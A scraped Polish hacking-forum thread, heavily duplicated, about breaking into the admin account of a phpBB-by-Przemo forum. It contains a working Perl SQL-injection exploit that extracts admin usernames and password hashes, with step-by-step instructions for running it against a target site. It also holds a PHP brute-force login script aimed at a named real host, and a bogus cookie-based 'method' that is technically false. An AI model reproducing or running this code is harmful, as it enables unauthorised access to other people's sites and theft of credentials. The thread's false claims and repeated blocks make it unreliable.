Katalog wyszukanych fraz
Włamanie się na forum.
Citizen Journalism - t by Krzysztof Kozek!
Witam chciałem sie spytać jak sie można włamać na konto admina nie znając hasła w w phpbb by przemo
Witam chciałem sie spytać jak sie można włamać na konto admina nie znając hasła w w phpbb by przemo
koles lepiej pograj w Mario, mozesz pójsc na dlugo siedziec nawet jak masz antene
może jakiś poradnik jak sie włamać na forum które jest na skrypcie przemo
Czyżby kolejny zdesperowany hacker, który chce podbić świat?
ja nie wiem jak znajdziesz jakiegos exploita do tego to naopisz do mine na pw napewno mnie to bardzo zainteresuje aha i jak naprawde znajdziesz to jestes mistrzem swiata L:D:D:D:D:D:d
Zapytaj się admina danego forum i może ci podane login i hasło mniej się będziesz musiał męczyć.. nie no ludzie są niemożliwi :lol:
http://www.milw0rm.com/
http://www.milw0rm.com/
fajna stronka he he he;d
czyżby atak na nedds???
czyżby atak na nedds???
Zapewne chodzi mu o konta na mu i rs.com z nedds:P
chciałbym zauważyć że nedds.pl to nie phpbb by przemo tylko IP.Board ^^,
Można się na przema włamać ale zależy na jaką wersję jak na najnowszą to bdzie raczej trudne jak na najstarszą bułka z masłem.
Ale jak na moje forum będziesz się włamać próbował to ni wiem co ci zrobie.
jak na najstarszą bułka z masłem.
więc pisz mistrzu B)
zapoznaj sie dokladnie jak dane forum jest zainstalowane zobacz w jakim pliku znajduje sie zapisane haslo login admina najprosciej forum dane musi znajdowac sie na jakims serverze zakos serwer
poznaj cala strukture php zauwazysz wtedy ze sa luki na forach pozdro
#!/usr/bin/perl #Exploit for phpbb modified by przemo #Coded by:krasza[krasza@gmail.com] #www:http://www.krasza.int.pl use strict; use warnings; use LWP::UserAgent; if(!$ARGV[0]){ printagent); print "[+]Ł±czę się z ",$url,"...\n"; $zadanie = new HTTP::Request POST => $dload; $zadanie->content_type('application/x-www-form-urlencoded'); $zadanie->content('subject=Bardzo+dobry+program%27%2C1158418260%2C%273712b478d0%27%2C2%29%2C%281%2C%28SELECT+CONCAT%28username%2C%27%3A%27%2Cuser_password%29+FROM+%60phpbb_users%60+WHERE+user_id%3D'.$id.'%29%2C%27Rewelacyjny+progs%27%2C1158418260%2C%273712b478d0%27%2C2%29%2F*&addbbcode18=&addbbcode20=12&helpbox=Rada%3A+Style+mog%B1+by%E6+stosowane+szybko+do+zaznaczonego+tekstu&message=Bardzo+dobry+program%2C+chociaz+po+jego+zainstalowaniu+nie+dziala+mi+prawidlowo+przegladarka+i+do+kaz ego+wpisu+dodaja+mi+sie+jakies+cyfry+i+litery%3A%2F&action=file&id='.$id.'&comment=post&submit=Wy%B6lij'); my $wynik2 = $ua->request($zadanie); if ($wynik2->is_success){ print "[+]Login i hasło admina zostalo dodane;]\n"; print "[+]Haslo:".$dload."?action=file&id=1\n"; }else{ print "[-]Proba nie udana\n"; }
to treść exploita.
krótka instrukcja
. ściągnij to: [url="http://www.activestate.com/Products/ActivePerl/"]http://www.activestate.com/Products/ActivePerl/[/url] 2. później start -> uruchom -> cmd -> wchodzisz przy pomocy cd do folderu z tym skryptem zapisanym jako explo.pl 3. wpisujesz perl explo.pl [url="http://nazwastrony.pl/forum"]http://nazwastrony.pl/forum[/url] numeruseraadmina 2 zamiast numeruuseraadmina wpisujesz cyfre 4. gotowe ^^
ale nie licz że coś z tym zdziałasz... bo to jest na phpBB modified v 1.12.5 by Przemo do wersji ściągniętych przed 19.12.2006 z downloadu ze strony przema (przemo.org)
nie zauważyłem wcześniejszego postu kolegi
zapoznaj sie dokladnie jak dane forum jest zainstalowane zobacz w jakim pliku znajduje sie zapisane haslo login admina najprosciej forum dane musi znajdowac sie na jakims serverze zakos serwer
poznaj cala strukture php zauwazysz wtedy ze sa luki na forach pozdro
rozbawiło mnie to do łez.
Jeśli sie nie ma pojęcia o czymś to sie w tej sprawie nie odzywa, to tak na przyszłość :P
Jak bym zamiescil to wczesniej to by pewnie zamkneli ten caly dzial ale macie i sie cieszcie
www.hackme.pl
Wiem ze nazwa wskazuje jednoznacznie ale to naprawde dobra stronka i jest na niej wszystko o tym temacie (nawet\zwlaszcza jak chakowac rozne fora)
Na tej stronce panuje 1 zasada - nie pomagasz nie odpisuj u nas tez to powinno byc a nie bicie bezsensownyh postow typu
¨Po co ci to¨,Jak ktos sie pyta znaczy ze ma powod .
Sa tam tylko pytania i odpowiedzi - zadnyh uwag ani komentazy
Jak bym zamiescil to wczesniej to by pewnie zamkneli ten caly dzial ale macie i sie cieszcie
www.hackme.pl
Wiem ze nazwa wskazuje jednoznacznie ale to naprawde dobra stronka i jest na niej wszystko o tym temacie (nawet\zwlaszcza jak chakowac rozne fora)
Na tej stronce panuje 1 zasada - nie pomagasz nie odpisuj u nas tez to powinno byc a nie bicie bezsensownyh postow typu
¨Po co ci to¨,Jak ktos sie pyta znaczy ze ma powod .
Sa tam tylko pytania i odpowiedzi - zadnyh uwag ani komentazy
ludzie dales link do jakiegos forum, na ktorym kazdy mysli ze jest wielki haker i szuka dzieci zeby go wielbili
tak naprawde g**** na tym forum jest
co do samego topicu, wlamanie na skrypt forum o popularnosci przemo to nie jest 5 minut, czy 1 godzina
ogolnie wyglada to tak, ze albo zdobywasz dostep do serwera (www lub mysql), czyli skupiasz sie problemach serwera
albo skupiasz sie na skrypcie czytajac (dziesiatki|setki) tysiecy kodu i szukajac błedow
hcecie wiedziec jak wlamac sie na forum przemo:
trzeba zciagnanc dodatek do mozilli ktory zciaga naglowki
na forum ktore chcemy zchakowac musimy sie zarejestrowac i zaznaczyc opcje auto loign czy cos podobnego
potem logujemy sie na to forum grzebiemy trohe po panelu admina (nic nie szukajac tylko klikac)
wchodzimy w pliki kookies naszego gompa i tam szukamy pliku z tego forum i wnim bedzie napisane login i aslo admina
@up
To jest z tego forum a ono nie jest takie jak mowisz tylko porzadne forum (ale nic nie dorowna temu) na ktorym jest wiele ciekawyh zeczy i programow dla poczatkujacego i zaawansowanego hakera
POZDRO
hcecie wiedziec jak wlamac sie na forum przemo:
trzeba zciagnanc dodatek do mozilli ktory zciaga naglowki
na forum ktore chcemy zchakowac musimy sie zarejestrowac i zaznaczyc opcje auto loign czy cos podobnego
potem logujemy sie na to forum grzebiemy trohe po panelu admina (nic nie szukajac tylko klikac)
wchodzimy w pliki kookies naszego gompa i tam szukamy pliku z tego forum i wnim bedzie napisane login i aslo admina
@up
To jest z tego forum a ono nie jest takie jak mowisz tylko porzadne forum (ale nic nie dorowna temu) na ktorym jest wiele ciekawyh zeczy i programow dla poczatkujacego i zaawansowanego hakera
POZDRO
zacytowalem zebys potem przypadkiem nie zedytowal swojego postu
przeczytaj jeszcze raz to co napisales, cos w rodzaju czytanie ze zrozumieniem
juz nie musisz czytac o cookies i jak dziala system logowania
Wiem ze jest baaaardzo duzo bledow ortograficznych ale to nie problem kazdy zrozumial o co chodzi i jak nie probowales to nic nie pisz zproboj wlamac sie na jkais forum tym sposoben to nie jest trudne i zobaczysz ze to jest napisane tak jak powinno byc , a jak masz lepszy sposob zeby to napisac ... ORISZE BARDZO
to wlam sie tym sposobem gdziekolwiek
od poczatku:
"trzeba zciagnanc dodatek do mozilli ktory zciaga naglowki " - naglowki, czyli chodzi o zapytania http ? i odpowiedzi do nich ?
"na forum ktore chcemy zchakowac musimy sie zarejestrowac i zaznaczyc opcje auto loign czy cos podobnego" - ok, jako normalny uzytkownik
"potem logujemy sie na to forum grzebiemy trohe po panelu admina (nic nie szukajac tylko klikac) " - nie mamy dostepu do panelu admina, bo jestesmy zwyklym uzytkownikiem
"wchodzimy w pliki kookies naszego gompa i tam szukamy pliku z tego forum i wnim bedzie napisane login i aslo admin" - w cookies nie sa zapisywane czyste hasla, wszystkie fora uzywaja wlasnych algorytmow, i zapisuja tylko hash, zeby potem porownac dane z poprzednia sesja z bazy, co najlepsze uzywa sie zazwyczaj algorytmow jednostronnych, typu md5
pozatym skad mial by Ci sie tam nawet pojawic login administratora, jak byles zalogowany jako zwykly uzytkownik !?
z logicznego myslenia mozna wywnioskowac ze to nie bedzie dzialalo
"i jak nie probowales to nic nie pisz" - i ty probowales i gdzie sie wlamales ?
chyba tylko ja na tym forum nie cwicze codziennie i nie mam doswiadczenia :} , przynajmniej jakas teorie mam
Dziekuje za poluczenie o wielki wszehwiedzoncyh na prawde po twoih postah mozna sie wiele dowiedziec o tym jak zhakowac forum przemu zkladam poklony........... :unsure:
Dziekuje za poluczenie o wielki wszehwiedzoncyh na prawde po twoih postah mozna sie wiele dowiedziec o tym jak zhakowac forum przemu zkladam poklony........... :unsure:
ehhh, jak myslisz jak by to bylo gdyby byle kto, kto nie ma pojecia o hackingu, wlamal sie wciagu 5 minut na forum jakiekolwiek w necie oparte o jeden skrypt, tylko dlatego ze dostal jakis program od znajomego ?
Phpbb by przemo jest jednym z najczesciej uzywanych skryptow na swiecie, rozwijany przez lata
shackowanie czego kolwiek to nie jest 5 minut ! (chyba ze windowsa bez poprawek, trzeba przyznac, albo starsze wersje popularnego oprogramowania sieciowego)
Hackowanie to sa dni, tygodnie, miesiace i do tego trzeba faktycznie miec duze umiejetnosci, trzeba umiec szukac bledow w oprogramowaniu, myslec niekonwencjonalnie, to wszystko zdobywa sie przez doswiadczenie
Wiec, nie mysl ze w 5 minut shackujesz taki skrypt (co innego skrypt kolegi/kolezanki, ktorzy nie maja duzego pojecia na temat zabezpieczania tego typu rzeczy)
btw. staraj sie pisac 'c' i 's' czasami, bo jest to troche uciazliwe
Podsumowuje wszystko co napisaliście i wnioskuję ze nikt z was nie wiem jak wejść na konto admina na najnowszej wersji 1.12.5 phpbb by przemo. Dobrze wnioskuję ?
PS Ja też nie umiem... :)
oto kod :
sploit.php
<?php error_reporting(E_ALL); @ob_end_flush(); function hack($host='lo50.nazwa.pl',$file='/dziennik/prelogowanie.php',$array,$port=80){ $lenght=0; $out2=''; if ( $fp = fsockopen($host, $port, $errno, $errstr, 1)) { $out = "POST $file HTTP/1.0\r\n"; $out .= "Host: $host\r\n"; $out .= "Content-Type: application/x-www-form-urlencoded\r\n"; foreach ($array as $id =>$val){ $out2.="$id=$val&"; } $out2=substr($out2,0,$lenght=strlen($out2)-1); $out .= "Content-Length: $lenght\r\n"; $out .= "\r\n"; $out.=$out2."\r\n"; $out .= "Connection: Close\r\n\r\n"; fwrite($fp, $out); echo "<hr><textarea rows=\"30\" cols=\"70\">$out2</textarea><br><textarea rows=\"30\" cols=\"70\">$out</textarea><br>"; $echo=''; while (!feof($fp)) { $echo .= fgets($fp, 128); } fclose($fp); echo '<textarea rows="30" cols="70">'.$echo."</textarea><br>$echo"; echo '<br><small>SUCCES</small><br><hr> '; }else{ echo '<br><small><font color="red">ERROR</font></small><br><hr& gt;'; } } ?>
kod 2
exploit.php
<?php include('sploit.php'); set_time_limit(0); @ob_end_flush(); if (!empty($_GET['INTRO'])) { $INTRO=$_GET['INTRO']; }else { $INTRO=''; } if (!empty($_GET['END'])) { $END=$_GET['END']; }else { $END="<br>"; } define('Intro',$INTRO); define('End',$END); function MakeWordList($min=1,$max=2,$chars= null ,$text='',$array= array()){ if ($chars== null){ $array=array(); for ($i=0;$i<=255;$i++){ $array[$i]=chr($i); } $chars=$array; } foreach ($chars as $id => $value){ if (strlen($text.$value)>=$min) { //$array[]=Intro.$text.$value.End; echo Intro.$text.$value.End; hack('lo50.nazwa.pl','/dziennik/prelogowanie.php',array('l ogin'=>'admin', 'haslo' => $text.$value),80); } if (strlen($text.$value)<$max) { MakeWordList(&$min,&$max,$chars,$text.$value,& $array); } } return $array; } if (isset($_GET['chars'])&&$_GET['chars']!='') { $chars=explode(":", $_GET['chars']); }else { $chars=''; } if (!isset($_GET['min'])or!is_numeric($_GET['min'])) { $min=''; }else { $min=$_GET['min']; } if (!isset($_GET['max'])or!is_numeric($_GET['max'])) { $max=''; }else { $max=$_GET['max']; } if (!isset($_GET['text'])) { $text=''; }else { $text=$_GET['text']; } if (isset($_GET['text'])) { MakeWordList($min,$max,$chars,$text); exit(); }else{ ?> <form method="GET"> minimum znaków: <br> <input type=" text" name="min" ><br> maximum znaków: <br> <input type="text" name="max" ><br> <hr> dozwolone znaki <small>oddziel : np a:b:1</small>(brak oznacza wszystkie elementy z kodu ascii)<br> <textarea name="chars" onclick="this.value=''">a:b:c:d:e:f:g:h:i:j:k:l:m:n:o:p:r:s:t :w:y:x:z:v:q:u:0:1:2:3:4:5:6:7:8:9</textarea><br><;hr> znak początkowy <input type=" text" value="" name="INTRO"><br> znak końcowy <input type="text" value="<br>" name="END"><br> rozpocząć wyrazy od <input type="text" name="text" value=""><br><hr> <input type="submit" value="generuj"> </form> <?php }?>
jak to działa ?? otoz w pliku sploit jest funkcja ktora wysyla zapytanie do serwera tak jakby sie chciala zalogowac , i pobiera odpowiedz,
w pliku exploit jest funkcja rekurencyjna ktora generuje wszystkie mozliwe kombinacje hasel z mozliwych...
to jest tak na szybko wienc ten kto chce to sobie poprawi!
podgląd można zobaczyc na: http://lo50i.nazwa.pl/exploit.php
acha w funkcji hack podajemy adres hosta , i adres pliku ;) :) jesli w formularzu potrzebna jest wieksza ilosc pol to dopisujemy je do arraya czyli robimy array(pole => 'wartosc').. ale chyba tego nie musze tlumaczyc...
zapraszam do tego artykułu a ten i inne na ten temat zamykam
http://nedds.pl/php-attack-t48526.html
http://haxite.org/index.php3?site=artykul&nx1=artykul_view&id=543
zamist
function hack($host='lo50.nazwa.pl',$file='/dziennik/prelogowanie.php',$a rray,$port=80){
ma byc
function hack($host='lo50.nazwa.pl',$file='/dziennik/prelogowanie.php',$array,$port=80){
niepotrzebne spacje w nazwie zmiennej
ten sposob jest bardzo wolny, gdyby haslo bylo 12345 to jeszcze przejdzie
przeszukiwania hasla np. think987 to juz tygodnie/miesiace ??
a jak przerwie wam polaczenie z netem w trakcie lamania i nie wiecie a czym skonczylo, to trzeba od poczatku, wiec 'lata' ;]
Tony sam to pisałeś ??
ok już poprawiłem...tak ten artykuł jest mój ale wcześniej był na haxite.org hohoho i jeszcze troche temu napisany i zaczeli pisać o tym to odnalazłem go i zapodałem. poza tym nie bede powtarzał to w nieskończoność te posty które pisze są sprawdzone a jak nie są pisane przeze mnie to najpierw je sprawdzam a potem dopiero opublikuje.
ten sposob jest bardzo wolny, gdyby haslo bylo 12345 to jeszcze przejdzie
przeszukiwania hasla np. think987 to juz tygodnie/miesiace ??
a jak przerwie wam polaczenie z netem w trakcie lamania i nie wiecie a czym skonczylo, to trzeba od poczatku, wiec 'lata' ;]
a z tym się nie zgodze ponieważ:
1) sprawdzane było na hasłach od 5 do 32 znaków !dowolnych! ( mówię tutaj o abc...123...~!@#$) + spacja i maksymalny czas odszukiwania wynosił 3-4 minut
2)wydaje mi się, że to jest optymalny kod na atak php bo jak w innym poście wspomniał thinkbot :" trzeba szukać dziur w kodzie" natomiast tutaj nie ma opcji żeby się kod nie "wyłożył". jak wspomniałem wcześniej testowane nie tylko na platformie typu Windows, ale też testowane na platformie Linuxowej t.j. SuSE, Debian, Slackware i FreeBSD.
Przypuszczam, że ten kod zadziałałby też na Nedds.pl z tego względu, że nie słyszałem i nie czytałe ponieważ nie znalazłem na żadnej stronie poprawki do tego.
[...]
1) sprawdzane było na hasłach od 5 do 32 znaków !dowolnych! ( mówię tutaj o abc...123...~!@#$) + spacja i maksymalny czas odszukiwania wynosił 3-4 minut
2)wydaje mi się, że to jest optymalny kod na atak php bo jak w innym poście wspomniał thinkbot :" trzeba szukać dziur w kodzie" natomiast tutaj nie ma opcji żeby się kod nie "wyłożył". jak wspomniałem wcześniej testowane nie tylko na platformie typu Windows, ale też testowane na platformie Linuxowej t.j. SuSE, Debian, Slackware i FreeBSD.
[...]
ohh, dup, to jest technicznie niemozliwe
tygodnie, miesiace, lata
jak byś to wyprobował to byś się nie kłócił...spróbuj to pogadamy...jak wynajdziesz lepszy sposób na to to napisz i wtedy ja wyraże się "krytycznie" na ten temat.
P.S. czytałeś komentaże do tego artykułu?? chyba nie każdy który się tam wypowiadał w 5-cio stopniowej skali dawał 6(tak na marginesie)
ja niestety wchodze w ftp ze skryptem :| po czym widze tylko jego kod... jak go uruchomic ?
jak byś to wyprobował to byś się nie kłócił...spróbuj to pogadamy...jak wynajdziesz lepszy sposób na to to napisz i wtedy ja wyraże się "krytycznie" na ten temat.
P.S. czytałeś komentaże do tego artykułu?? chyba nie każdy który się tam wypowiadał w 5-cio stopniowej skali dawał 6(tak na marginesie)
ech, nie umisz przyzac sie do bledow
if ( $fp = fsockopen($host, $port, $errno, $errstr, 1)) { [...] fwrite($fp, $out); echo "<hr><textarea rows=\"30\" cols=\"70\">$out2</textarea><br><textarea rows=\"30\" cols=\"70\">$out</textarea><br>"; $echo=''; while (!feof($fp)) { $echo .= fgets($fp, 128); } fclose($fp); echo '<textarea rows="30" cols="70">'.$echo."</textarea><br>$echo"; echo '<br><small>SUCCES</small><br><hr> '; }else{ echo '<br><small><font color="red">ERROR</font></small><br><hr& gt;'; }
w tym podobno twoim kodzie, nawet nie jest sprawdzany czy haslo jest dobre czy nie
haslo 'tony',
zakres znakow ze skryptu: a:b:c:d:e:f:g:h:i:j:k:l:m:n:o:p:r:s:t:w:y:x:z:v:q:u:0:1:2:3:4:5:6:7:8:9 = 36 znakow
36^4 = 1 679 616 kombinacji
zaleznie od predkosci serwera, powiedzmy ze jest 100/s zadan (co jest przesada 'lekka', wiekszosc serwerow ogranicza liczbe zadan od aplikacji)
wiec na sprawdzenie calego zakresu potrzeba ~280 minut
oczywiscie haslo 'tony' bedzie wczesniej, ale
"sprawdzane było na hasłach od 5 do 32 znaków !dowolnych! ( mówię tutaj o abc...123...~!@#$) + spacja i maksymalny czas odszukiwania wynosił 3-4 minut" - w 4 minuty ?
nie bardzo masz pojecie o czym piszesz, wiec nie sadze ze ten skrypt jest twoj
takich obliczen to w gimnazjum juz uczą, z profilu wynika ze 18
"P.S. czytałeś komentaże do tego artykułu?? chyba nie każdy który się tam wypowiadał w 5-cio stopniowej skali dawał 6(tak na marginesie)" - tu mialo byc bez 'nie' ? bo z 'nie', nie bardzo rozumie
dubel
buahahaha własnie widać jaki haker sie odezwał :lol: myślisz, że jak przepiszesz pare linijek kodu to jesteś fajny. radze najpierw sprawdzić a potem otwierać gębe w takich sprawach. z racji tego, że piszesz durne posty zamykam ten temat.
P.S. tak na marginesie to ten kod działa też na nedds ;) jak byś nie wiedział. napisz wkońcu jakiś post tego pokroju bo narazie to tylko krytykujesz wszystkich. aha jeszcze jedno jeszcze jeden post w stylu "ten kod jest do [cenzura]" albo "nie twój" bedzie podchodzić pod ban (patrz: administracja nedds.pl)
zanotowane.pl doc.pisz.pl pdf.pisz.pl limerykarnia.xlx.pl
Witam chciałem sie spytać jak sie można włamać na konto admina nie znając hasła w w phpbb by przemo
Witam chciałem sie spytać jak sie można włamać na konto admina nie znając hasła w w phpbb by przemo
koles lepiej pograj w Mario, mozesz pójsc na dlugo siedziec nawet jak masz antene
może jakiś poradnik jak sie włamać na forum które jest na skrypcie przemo
Czyżby kolejny zdesperowany hacker, który chce podbić świat?
ja nie wiem jak znajdziesz jakiegos exploita do tego to naopisz do mine na pw napewno mnie to bardzo zainteresuje aha i jak naprawde znajdziesz to jestes mistrzem swiata L:D:D:D:D:D:d
Zapytaj się admina danego forum i może ci podane login i hasło mniej się będziesz musiał męczyć.. nie no ludzie są niemożliwi :lol:
http://www.milw0rm.com/
http://www.milw0rm.com/
fajna stronka he he he;d
czyżby atak na nedds???
czyżby atak na nedds???
Zapewne chodzi mu o konta na mu i rs.com z nedds:P
chciałbym zauważyć że nedds.pl to nie phpbb by przemo tylko IP.Board ^^,
Można się na przema włamać ale zależy na jaką wersję jak na najnowszą to bdzie raczej trudne jak na najstarszą bułka z masłem.
Ale jak na moje forum będziesz się włamać próbował to ni wiem co ci zrobie.
jak na najstarszą bułka z masłem.
więc pisz mistrzu B)
zapoznaj sie dokladnie jak dane forum jest zainstalowane zobacz w jakim pliku znajduje sie zapisane haslo login admina najprosciej forum dane musi znajdowac sie na jakims serverze zakos serwer
poznaj cala strukture php zauwazysz wtedy ze sa luki na forach pozdro
#!/usr/bin/perl #Exploit for phpbb modified by przemo #Coded by:krasza[krasza@gmail.com] #www:http://www.krasza.int.pl use strict; use warnings; use LWP::UserAgent; if(!$ARGV[0]){ printagent); print "[+]Ł±czę się z ",$url,"...\n"; $zadanie = new HTTP::Request POST => $dload; $zadanie->content_type('application/x-www-form-urlencoded'); $zadanie->content('subject=Bardzo+dobry+program%27%2C1158418260%2C%273712b478d0%27%2C2%29%2C%281%2C%28SELECT+CONCAT%28username%2C%27%3A%27%2Cuser_password%29+FROM+%60phpbb_users%60+WHERE+user_id%3D'.$id.'%29%2C%27Rewelacyjny+progs%27%2C1158418260%2C%273712b478d0%27%2C2%29%2F*&addbbcode18=&addbbcode20=12&helpbox=Rada%3A+Style+mog%B1+by%E6+stosowane+szybko+do+zaznaczonego+tekstu&message=Bardzo+dobry+program%2C+chociaz+po+jego+zainstalowaniu+nie+dziala+mi+prawidlowo+przegladarka+i+do+kaz ego+wpisu+dodaja+mi+sie+jakies+cyfry+i+litery%3A%2F&action=file&id='.$id.'&comment=post&submit=Wy%B6lij'); my $wynik2 = $ua->request($zadanie); if ($wynik2->is_success){ print "[+]Login i hasło admina zostalo dodane;]\n"; print "[+]Haslo:".$dload."?action=file&id=1\n"; }else{ print "[-]Proba nie udana\n"; }
to treść exploita.
krótka instrukcja
. ściągnij to: [url="http://www.activestate.com/Products/ActivePerl/"]http://www.activestate.com/Products/ActivePerl/[/url] 2. później start -> uruchom -> cmd -> wchodzisz przy pomocy cd do folderu z tym skryptem zapisanym jako explo.pl 3. wpisujesz perl explo.pl [url="http://nazwastrony.pl/forum"]http://nazwastrony.pl/forum[/url] numeruseraadmina 2 zamiast numeruuseraadmina wpisujesz cyfre 4. gotowe ^^
ale nie licz że coś z tym zdziałasz... bo to jest na phpBB modified v 1.12.5 by Przemo do wersji ściągniętych przed 19.12.2006 z downloadu ze strony przema (przemo.org)
nie zauważyłem wcześniejszego postu kolegi
zapoznaj sie dokladnie jak dane forum jest zainstalowane zobacz w jakim pliku znajduje sie zapisane haslo login admina najprosciej forum dane musi znajdowac sie na jakims serverze zakos serwer
poznaj cala strukture php zauwazysz wtedy ze sa luki na forach pozdro
rozbawiło mnie to do łez.
Jeśli sie nie ma pojęcia o czymś to sie w tej sprawie nie odzywa, to tak na przyszłość :P
Jak bym zamiescil to wczesniej to by pewnie zamkneli ten caly dzial ale macie i sie cieszcie
www.hackme.pl
Wiem ze nazwa wskazuje jednoznacznie ale to naprawde dobra stronka i jest na niej wszystko o tym temacie (nawet\zwlaszcza jak chakowac rozne fora)
Na tej stronce panuje 1 zasada - nie pomagasz nie odpisuj u nas tez to powinno byc a nie bicie bezsensownyh postow typu
¨Po co ci to¨,Jak ktos sie pyta znaczy ze ma powod .
Sa tam tylko pytania i odpowiedzi - zadnyh uwag ani komentazy
Jak bym zamiescil to wczesniej to by pewnie zamkneli ten caly dzial ale macie i sie cieszcie
www.hackme.pl
Wiem ze nazwa wskazuje jednoznacznie ale to naprawde dobra stronka i jest na niej wszystko o tym temacie (nawet\zwlaszcza jak chakowac rozne fora)
Na tej stronce panuje 1 zasada - nie pomagasz nie odpisuj u nas tez to powinno byc a nie bicie bezsensownyh postow typu
¨Po co ci to¨,Jak ktos sie pyta znaczy ze ma powod .
Sa tam tylko pytania i odpowiedzi - zadnyh uwag ani komentazy
ludzie dales link do jakiegos forum, na ktorym kazdy mysli ze jest wielki haker i szuka dzieci zeby go wielbili
tak naprawde g**** na tym forum jest
co do samego topicu, wlamanie na skrypt forum o popularnosci przemo to nie jest 5 minut, czy 1 godzina
ogolnie wyglada to tak, ze albo zdobywasz dostep do serwera (www lub mysql), czyli skupiasz sie problemach serwera
albo skupiasz sie na skrypcie czytajac (dziesiatki|setki) tysiecy kodu i szukajac błedow
hcecie wiedziec jak wlamac sie na forum przemo:
trzeba zciagnanc dodatek do mozilli ktory zciaga naglowki
na forum ktore chcemy zchakowac musimy sie zarejestrowac i zaznaczyc opcje auto loign czy cos podobnego
potem logujemy sie na to forum grzebiemy trohe po panelu admina (nic nie szukajac tylko klikac)
wchodzimy w pliki kookies naszego gompa i tam szukamy pliku z tego forum i wnim bedzie napisane login i aslo admina
@up
To jest z tego forum a ono nie jest takie jak mowisz tylko porzadne forum (ale nic nie dorowna temu) na ktorym jest wiele ciekawyh zeczy i programow dla poczatkujacego i zaawansowanego hakera
POZDRO
hcecie wiedziec jak wlamac sie na forum przemo:
trzeba zciagnanc dodatek do mozilli ktory zciaga naglowki
na forum ktore chcemy zchakowac musimy sie zarejestrowac i zaznaczyc opcje auto loign czy cos podobnego
potem logujemy sie na to forum grzebiemy trohe po panelu admina (nic nie szukajac tylko klikac)
wchodzimy w pliki kookies naszego gompa i tam szukamy pliku z tego forum i wnim bedzie napisane login i aslo admina
@up
To jest z tego forum a ono nie jest takie jak mowisz tylko porzadne forum (ale nic nie dorowna temu) na ktorym jest wiele ciekawyh zeczy i programow dla poczatkujacego i zaawansowanego hakera
POZDRO
zacytowalem zebys potem przypadkiem nie zedytowal swojego postu
przeczytaj jeszcze raz to co napisales, cos w rodzaju czytanie ze zrozumieniem
juz nie musisz czytac o cookies i jak dziala system logowania
Wiem ze jest baaaardzo duzo bledow ortograficznych ale to nie problem kazdy zrozumial o co chodzi i jak nie probowales to nic nie pisz zproboj wlamac sie na jkais forum tym sposoben to nie jest trudne i zobaczysz ze to jest napisane tak jak powinno byc , a jak masz lepszy sposob zeby to napisac ... ORISZE BARDZO
to wlam sie tym sposobem gdziekolwiek
od poczatku:
"trzeba zciagnanc dodatek do mozilli ktory zciaga naglowki " - naglowki, czyli chodzi o zapytania http ? i odpowiedzi do nich ?
"na forum ktore chcemy zchakowac musimy sie zarejestrowac i zaznaczyc opcje auto loign czy cos podobnego" - ok, jako normalny uzytkownik
"potem logujemy sie na to forum grzebiemy trohe po panelu admina (nic nie szukajac tylko klikac) " - nie mamy dostepu do panelu admina, bo jestesmy zwyklym uzytkownikiem
"wchodzimy w pliki kookies naszego gompa i tam szukamy pliku z tego forum i wnim bedzie napisane login i aslo admin" - w cookies nie sa zapisywane czyste hasla, wszystkie fora uzywaja wlasnych algorytmow, i zapisuja tylko hash, zeby potem porownac dane z poprzednia sesja z bazy, co najlepsze uzywa sie zazwyczaj algorytmow jednostronnych, typu md5
pozatym skad mial by Ci sie tam nawet pojawic login administratora, jak byles zalogowany jako zwykly uzytkownik !?
z logicznego myslenia mozna wywnioskowac ze to nie bedzie dzialalo
"i jak nie probowales to nic nie pisz" - i ty probowales i gdzie sie wlamales ?
chyba tylko ja na tym forum nie cwicze codziennie i nie mam doswiadczenia :} , przynajmniej jakas teorie mam
Dziekuje za poluczenie o wielki wszehwiedzoncyh na prawde po twoih postah mozna sie wiele dowiedziec o tym jak zhakowac forum przemu zkladam poklony........... :unsure:
Dziekuje za poluczenie o wielki wszehwiedzoncyh na prawde po twoih postah mozna sie wiele dowiedziec o tym jak zhakowac forum przemu zkladam poklony........... :unsure:
ehhh, jak myslisz jak by to bylo gdyby byle kto, kto nie ma pojecia o hackingu, wlamal sie wciagu 5 minut na forum jakiekolwiek w necie oparte o jeden skrypt, tylko dlatego ze dostal jakis program od znajomego ?
Phpbb by przemo jest jednym z najczesciej uzywanych skryptow na swiecie, rozwijany przez lata
shackowanie czego kolwiek to nie jest 5 minut ! (chyba ze windowsa bez poprawek, trzeba przyznac, albo starsze wersje popularnego oprogramowania sieciowego)
Hackowanie to sa dni, tygodnie, miesiace i do tego trzeba faktycznie miec duze umiejetnosci, trzeba umiec szukac bledow w oprogramowaniu, myslec niekonwencjonalnie, to wszystko zdobywa sie przez doswiadczenie
Wiec, nie mysl ze w 5 minut shackujesz taki skrypt (co innego skrypt kolegi/kolezanki, ktorzy nie maja duzego pojecia na temat zabezpieczania tego typu rzeczy)
btw. staraj sie pisac 'c' i 's' czasami, bo jest to troche uciazliwe
Podsumowuje wszystko co napisaliście i wnioskuję ze nikt z was nie wiem jak wejść na konto admina na najnowszej wersji 1.12.5 phpbb by przemo. Dobrze wnioskuję ?
PS Ja też nie umiem... :)
oto kod :
sploit.php
<?php error_reporting(E_ALL); @ob_end_flush(); function hack($host='lo50.nazwa.pl',$file='/dziennik/prelogowanie.php',$array,$port=80){ $lenght=0; $out2=''; if ( $fp = fsockopen($host, $port, $errno, $errstr, 1)) { $out = "POST $file HTTP/1.0\r\n"; $out .= "Host: $host\r\n"; $out .= "Content-Type: application/x-www-form-urlencoded\r\n"; foreach ($array as $id =>$val){ $out2.="$id=$val&"; } $out2=substr($out2,0,$lenght=strlen($out2)-1); $out .= "Content-Length: $lenght\r\n"; $out .= "\r\n"; $out.=$out2."\r\n"; $out .= "Connection: Close\r\n\r\n"; fwrite($fp, $out); echo "<hr><textarea rows=\"30\" cols=\"70\">$out2</textarea><br><textarea rows=\"30\" cols=\"70\">$out</textarea><br>"; $echo=''; while (!feof($fp)) { $echo .= fgets($fp, 128); } fclose($fp); echo '<textarea rows="30" cols="70">'.$echo."</textarea><br>$echo"; echo '<br><small>SUCCES</small><br><hr> '; }else{ echo '<br><small><font color="red">ERROR</font></small><br><hr& gt;'; } } ?>
kod 2
exploit.php
